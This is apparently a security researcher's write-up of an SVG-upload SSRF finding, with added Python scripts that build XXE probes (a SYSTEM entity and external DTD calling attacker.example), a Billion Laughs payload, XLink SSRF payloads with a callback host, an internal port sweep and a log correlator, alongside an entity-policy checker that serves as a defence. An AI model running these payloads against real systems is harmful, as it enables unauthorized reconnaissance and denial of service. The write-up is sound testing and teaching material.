SSRF (Server-Side Request Forgery) has become a popular attack surface in upload functionality, where the application fetches assets such as images and documents from external resources.
SVG is an XML-based vector image format used to display a variety of graphics on the Web and in other environments. Because of its XML structure it supports various XML features; one of them is XLink, which is responsible for creating internal and external links within an XML document.
During the testing process, I encountered an XLink-based SSRF that could be used to enumerate internal libraries, installed tools, GNOME versions and much more.
Incoming request at my server: interestingly, the Referer header shows that the request was generated from the application's internal network, where the app is hosted on port 3000.
Since the application accepts SVG images, the second step is to include a static entity to see whether the parser allows custom entities at all.
The parser allowed static entities, so the next step was to include SYSTEM entities together with a DOCTYPE that fetches a remote DTD, which is closer to an XXE attack. The backend parser blocked SYSTEM-based entities, however; they had strong validation against malicious or malformed XML.
With SYSTEM entities blocked, the attack surface is limited, so the next test is the Billion Laughs attack, since the application allowed static entities. Always note: before blindly fuzzing with assorted XML payloads, make sure you understand the parser logic. Before trying Billion Laughs, I sent the server a simple entity chain to see whether the parser renders the xml1 entity through a reference from the xml2 entity:
```xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [
  <!ENTITY xml1 "This is my first message">
  <!ENTITY xml2 "&xml1;">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="20" font-size="20">&xml2;</text>
</svg>
```
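The four probes described above (static entity, SYSTEM entity, external DTD, entity chain) and the Billion Laughs follow-up, written out in Python as an added example that is not part of the original post. Python's expat parser via xml.etree stands in for the target's backend to show what an entity-expanding parser hands to the renderer, next to a declaration-time policy check of the kind the target evidently applied (reject external DTDs, SYSTEM/PUBLIC entities and entity-to-entity references before anything is expanded). The host attacker.example and the entity names are assumptions.

```python
"""Probe an SVG parser's entity handling, and a server-side policy check.

Added example, not code from the original post. Payload strings are
constructed here; attacker.example is a hypothetical callback host.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat

SVG_NS = "http://www.w3.org/2000/svg"
ATTACKER = "http://attacker.example"  # hypothetical listener you control


def svg_doc(dtd_subset, body, doctype_external=None):
    """Wrap a DOCTYPE internal subset and a <text> body into a full SVG."""
    ext = f' SYSTEM "{doctype_external}"' if doctype_external else ""
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="no"?>\n'
        f"<!DOCTYPE svg{ext} [\n{dtd_subset}\n]>\n"
        f'<svg xmlns="{SVG_NS}" width="200" height="50">\n'
        f'<text x="0" y="20" font-size="20">{body}</text>\n</svg>\n'
    )


def billion_laughs(depth=9, fanout=10):
    """Exponential expansion: `depth` levels, each referencing the previous `fanout` times."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return svg_doc("\n".join(decls), f"&lol{depth};")


def expansion_bytes(depth=9, fanout=10, base="lol"):
    """Size the parser would have to materialise for billion_laughs()."""
    return fanout ** depth * len(base)


PAYLOADS = {
    # 1. static internal entity: does the parser expand custom entities at all?
    "static": svg_doc('<!ENTITY xml1 "This is my first message">', "&xml1;"),
    # 2. entity referencing entity: the chain test before Billion Laughs
    "nested": svg_doc(
        '<!ENTITY xml1 "This is my first message">\n<!ENTITY xml2 "&xml1;">',
        "&xml2;",
    ),
    # 3. external (SYSTEM) general entity: classic XXE / out-of-band fetch
    "system": svg_doc(f'<!ENTITY xxe SYSTEM "{ATTACKER}/evil.dtd">', "&xxe;"),
    # 4. external DTD named on the DOCTYPE itself
    "doctype": svg_doc("", "hi", doctype_external=f"{ATTACKER}/evil.dtd"),
    # 5. the amplification payload
    "billion_laughs": billion_laughs(),
}


def rendered_text(svg):
    """What a parser that expands internal entities hands to the renderer."""
    root = ET.fromstring(svg)
    return root[0].text  # the <text> element


class EntityPolicyViolation(Exception):
    pass


def check_entity_policy(svg, max_entities=16):
    """Declaration-time check: external DTDs, SYSTEM/PUBLIC entities and
    entities whose replacement text references another entity are rejected
    before any expansion. Returns (accepted, reason)."""
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            raise EntityPolicyViolation(f"external DTD {system_id or public_id}")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:
            raise EntityPolicyViolation(f"external entity {name}")
        # expat reports the literal replacement text, so an inner
        # reference such as &xml1; is still visible here, unexpanded
        if value and "&" in value:
            raise EntityPolicyViolation(f"entity {name} references another entity")
        seen.append(name)
        if len(seen) > max_entities:
            raise EntityPolicyViolation("too many entity declarations")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(svg, True)
    except EntityPolicyViolation as exc:
        return False, str(exc)
    return True, f"{len(seen)} static entities"


if __name__ == "__main__":
    for name, svg in PAYLOADS.items():
        print(name, check_entity_policy(svg))
    print("static renders as:", rendered_text(PAYLOADS["static"]))
```

Run it and the policy accepts only the static payload, while `rendered_text` shows that the stock expat-backed parser happily expands both the static entity and the xml2 → xml1 chain. Because the check fires in the declaration handlers, the Billion Laughs document is refused at its first chained entity and never reaches the body, which is why this is safer than trying to catch the expansion after the fact.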
Unfortunately, the parser blocks entity-to-entity references as well, so our attack surface is now at ground level. What remains is the "picture present" fingerprinting trick: include the internal path of a picture that ships with some package on the system, and we get an interaction only if that picture is present, as described by @flyod at https://hackerone.com/reports/223203
To enumerate as much as possible, we need to build a wordlist of pictures that are likely to be present on the system.
Now it is time to try different open ports, or just different paths, and fuzz them along with all the collected internal picture paths to fingerprint the libraries, scripts and tools installed, along with their versions.
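A payload factory and callback correlator for the steps above (the XLink SSRF probe, the local-picture wordlist, and the port/path sweep), as an added example that is not part of the original post. The host attacker.example, the wordlist entries and the access-log lines are constructed; the mechanism that ties a callback to a present local picture is an assumption stated in the code, not something the article confirms.

```python
"""SVG XLink SSRF payloads and callback correlation.

Added example, not code from the original post. Host names, wordlist
entries and log lines are constructed for illustration.
"""
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
CALLBACK = "http://attacker.example/cb"  # hypothetical listener you control

# Illustrative wordlist (constructed). Build the real one from the file lists
# of the packages you want to fingerprint, e.g.
#   dpkg -L <pkg> | grep -Ei '\.(png|jpe?g|gif|xpm)$'
CANDIDATES = {
    "debian": "/usr/share/pixmaps/debian-logo.png",
    "python2.7": "/usr/share/pixmaps/python2.7.xpm",
    "gnome": "/usr/share/pixmaps/gnome-logo-text.png",
}


def token_for(path):
    """Short deterministic tag so a callback can be mapped back to a path."""
    return hashlib.sha256(path.encode()).hexdigest()[:12]


def svg_with_images(hrefs):
    """Minimal SVG whose only content is <image> elements the renderer must fetch."""
    items = "\n".join(
        f'  <image xlink:href="{h}" width="1" height="1"/>' for h in hrefs
    )
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<svg xmlns="{SVG_NS}" xmlns:xlink="{XLINK_NS}" width="1" height="1">\n'
        f"{items}\n</svg>\n"
    )


def svg_ssrf(url):
    """Plain XLink SSRF probe: the first upload, one external image."""
    return svg_with_images([url])


def fingerprint_payloads(candidates, callback=CALLBACK):
    """One SVG per candidate: the local picture first, then a tagged callback.
    Assumption (not stated by the article): the renderer gives up on a missing
    local image before fetching the next one, so the callback only arrives
    when the local file exists. Returns {token: (label, path, svg)}."""
    out = {}
    for label, path in candidates.items():
        tok = token_for(path)
        svg = svg_with_images([f"file://{path}", f"{callback}?t={tok}"])
        out[tok] = (label, path, svg)
    return out


def internal_targets(ports, paths, host="127.0.0.1"):
    """URLs for the port/path sweep through the same SSRF."""
    return [f"http://{host}:{p}{path}" for p in ports for path in paths]


# Common log format: "GET /cb?t=... HTTP/1.1" 200 0 "referer"
LOG_RE = re.compile(
    r'"(?:GET|HEAD) (?P<target>\S+) HTTP/[\d.]+" \d+ \d+ "(?P<referer>[^"]*)"'
)


def correlate(log_lines, payloads):
    """Map listener hits back to the candidate that produced them.
    Returns {label: (path, referer)} for every known token seen."""
    hits = {}
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        tok = parse_qs(urlsplit(m["target"]).query).get("t", [None])[0]
        if tok in payloads:
            label, path, _ = payloads[tok]
            hits[label] = (path, m["referer"])
    return hits


def demo():
    """Pretend only the debian picture exists; correlate constructed log lines."""
    payloads = fingerprint_payloads(CANDIDATES)
    present = token_for(CANDIDATES["debian"])
    log = [  # constructed listener access-log lines
        f'10.0.0.7 - - [01/Jan/2024:12:00:00 +0000] "GET /cb?t={present} HTTP/1.1"'
        ' 200 0 "http://127.0.0.1:3000/upload" "-"',
        '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /favicon.ico HTTP/1.1"'
        ' 404 0 "-" "-"',
    ]
    return correlate(log, payloads)


if __name__ == "__main__":
    print(svg_ssrf(f"{CALLBACK}/probe"))
    print(demo())
    print(internal_targets([3000, 8080], ["/", "/admin"]))
```

The Referer captured with each hit is worth keeping: as in the request shown earlier, it tells you which internal origin (host and port) the renderer runs under, which seeds the port and path list for the sweep. If the renderer you are up against does not stop at a missing local image, drop the callback from the fingerprint SVGs and compare the rendered output instead; the token mapping still applies to whatever channel you observe.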